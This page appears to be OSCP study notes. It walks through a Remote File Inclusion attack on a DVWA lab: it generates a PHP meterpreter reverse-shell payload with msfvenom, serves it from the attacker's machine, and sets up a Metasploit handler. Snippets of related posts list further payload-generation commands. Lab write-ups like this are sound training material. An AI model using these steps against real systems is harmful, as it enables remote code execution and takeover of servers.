2. 程式人生 > 其它 >OSCP Security Technology - Remote File Inclusion(RFI)

OSCP Security Technology - Remote File Inclusion(RFI)

阿新 發佈:2021-08-15

OSCP Security Technology - Remote File Inclusion(RFI)

DVWA

Download and install DVWA .

https://dvwa.co.uk/

Pre-set

Browser the following website.(admin/password)

http://192.168.2.52/dvwa/login.php

Set the security level to low.

File Inclusion

Click File Inclusion button.

Modify the URL:

http://192.168.2.52/dvwa/vulnerabilities/fi/?page=http://www.baidu.com

Download php reverse shell from pentestmonkey website.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Move the shell file to /var/www/html, and modify the parameters - IP/port.

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.26 LPORT=4444 >> exploit.php

service apache2 stop
python -m SimpleHTTPServer 80

 
msfconsole
use exploit/multi/handler
set LHOST 192.168.2.26
set LPORT 4444
set payload php/meterpreter/reverse_tcp
exploit

Browser the following url:

http://192.168.2.52/dvwa/vulnerabilities/fi/?page=http://192.168.2.26/exploit.php

Result:

  2. Create a new session

shell
相信未來 - 該面對的絕不逃避,該執著的永不怨悔,該捨棄的不再留念,該珍惜的好好把握。

相關推薦

OSCP Security Technology - Remote File Inclusion(RFI)

OSCP Security Technology - Remote File Inclusion(RFI) DVWA Download and install DVWA . https://dvwa.co.uk/

OSCP Security Technology - Network Scanning(1)

OSCP Security Technology - Network Scanning(1) Scanning with Nmap namp -sn -oN /root/sweep.txt 192.168.2.0/24

OSCP Security Technology - Enumeration(2)

OSCP Security Technology - Enumeration(2) SMB Enumeration We found the tcp port 111 is open from the scanning result.

OSCP Security Technology - Finding Bad Characters

OSCP Security Technology - Finding Bad Characters Finding bad characters with immunity debugger. nano badchars.py

OSCP Security Technology - Generating Shellcode& Gaining Root

OSCP Security Technology - Generating Shellcode& Gaining Root Generating shellcode.(Note: LHOST is Kali Linux\'s IP)

OSCP Security Technology - Modifying Shellcode

OSCP Security Technology - Modifying Shellcode Generate a shellcode with msfvenom: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform wind

OSCP Security Technology - Java Applet Attack

OSCP Security Technology - Java Applet Attack Prepare a target virtual machine - IE11 on Win 7. Set the security level of IE to low, and add a exception to Java security tab.

OSCP Security Technology - Cross-Site Scripting(XSS)

OSCP Security Technology - Cross-Site Scripting(XSS) Installing XSS & MySQL FILE https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/

OSCP Security Technology - Windows Post Exploitation

OSCP Security Technology - Windows Post Exploitation Software stores in folder - C:/Users/IEUser/ netcat-1.11 (Download: https://eternallybored.org/misc/netcat/)

新手DVWA-File Inclusion

File Inclusion File Inclusion即檔案包含,是指使用了包含函式時,由於對引數過濾不當,導致使用者讀取和執行了意料之外的內容和命令

File Inclusion - Pikachu

概述: 檔案包含,是一個功能。在各種開發語言中都提供了內建的檔案包含函式,其可以使開發人員在一個程式碼檔案中直接包含(引入)另外一個程式碼檔案。

DVWA靶場——File Inclusion(檔案包含)

概述 在 Web 後臺開發中,程式設計師往往為了提高效率以及讓程式碼看起來更加簡潔,會使用 “包含” 函式功能。比如把一系列功能函式都寫進 function.php 中,之後當某個檔案需要呼叫的時候直接在檔案頭中寫上一句 &

DVWA 通關指南:File Inclusion(檔案包含)

目錄File Inclusion(檔案包含)Low Level原始碼審計攻擊方式Medium Level原始碼審計攻擊方式High Level原始碼審計攻擊方式Impossible Level總結參考資料

DVWA之File Inclusion

技術標籤:DVWAshell 學習基礎檔案上傳 low level 檢視原始碼: <?php // The page we wish to display

git remote: Please remove the file from history and try again.

技術標籤:版本控制git 錯誤提示: remote: Powered by GITEE.COM [GNK-5.0] remote: error: File: 03a339da9645238a80724374c5e7238ef30e7d7f 182.49 MB, exceeds 100.00 MB.

Wii Remote——支援上下左右四個方向的幻燈片翻頁筆

如果你用 reveal.js 做幻燈片,你會發現沒有合適的翻頁筆可以用。具體來說,是沒有支援上下左右四個方向的翻頁筆。

Api架構奧義:ApiBoot實現零程式碼整合Spring Security & OAuth2

介面服務的安全性一直是程式設計師比較注重的一個問題,成熟的安全框架也比較多,其中一個組合就是Spring Security與OAuth2的整合,在ApiBoot內通過程式碼的封裝、自動化配置實現了自動化整合這兩大安全框架。

詳解Spring Security的HttpBasic登入驗證模式

【北京】 IT技術人員面對面試、跳槽、升職等問題,如何快速成長,獲得大廠入門資格和升職加薪的籌碼?與大廠技術大牛面對面交流,解答你的疑惑。《從職場小白到技術總監成長之路:我的職場焦慮與救贖》活動連結:碼

ApiBoot零程式碼整合Spring Security的JDBC方式獲取AccessToken

ApiBoot Security內部提供了兩種方式進行讀取需要認證的使用者資訊,在之前的文章中講到過ApiBoot Security使用記憶體方式(memory)不寫一行程式碼就可以實現使用者的認證並獲取AccessToken,那我們使用JDBC方式是不

檔案描述符fd(File Descriptor)簡介

之前看一些Linux網路程式設計的文章的時候老是會遇到檔案描述符fd這個東西,也沒太搞清楚。看了下面這篇文章講的還不錯,記錄下來吧。